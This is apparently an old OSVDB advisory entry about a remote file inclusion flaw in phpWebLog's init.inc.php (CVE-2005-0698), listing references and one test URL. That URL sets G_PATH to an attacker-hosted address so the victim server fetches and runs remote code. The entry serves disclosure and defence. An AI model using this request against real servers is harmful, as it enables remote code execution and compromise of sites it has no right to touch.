phpWebLog init.inc.php Remote File Inclusion

2005-03-07T23:57:49
ID OSVDB:14629
Type osvdb
Reporter OSVDB
Modified 2005-03-07T23:57:49

Description

Manual Testing Notes

http://[victim]/[dir]/include/init.inc.php?G_PATH=http://[attacker]/

References:

Vendor URL: http://phpweblog.org/ Security Tracker: 1013397 Related OSVDB ID: 14630 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0130.html CVE-2005-0698